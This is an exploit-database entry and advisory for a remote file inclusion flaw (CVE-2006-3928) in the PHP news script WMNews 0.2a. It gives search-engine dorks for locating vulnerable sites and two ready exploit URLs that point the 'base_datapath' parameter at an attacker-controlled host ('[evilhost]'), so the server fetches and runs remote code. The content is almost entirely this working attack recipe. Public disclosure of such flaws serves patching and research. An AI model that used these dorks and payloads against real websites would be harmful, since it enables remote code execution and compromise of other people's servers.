WMNews 0.2a - 'base_datapath' Remote File Inclusion

Author: uNfz
type: webapps
platform: php
port: 
date_added: 2006-07-26 
date_updated:  
verified: 1 
codes: OSVDB-27547;CVE-2006-3928 
tags: 
aliases:  
screenshot_url:  
application_url: 

       Advisory: WMNews Remote File Include Vulnerability
 Release Date: 2006/07/26
         Author: uNfz
  Critical Level: High
        Contact: unfzbr@hotmail.com
         Vendor: Warta Mikael

--------------------
--------------------

Searching / Dork:

allinurl: *.php?Artid=*
allinurl: *.php?ArtCat=*
allinurl: wmprint.php
allinurl: wmview.php

--------------------

exploration:

/index.php?config=1&base_datapath=http://[evilhost]
/[dir]/index.php?config=1&base_datapath=http://[evilhost]

--------------------

uNfz
irc.efnet.org

# milw0rm.com [2006-07-27]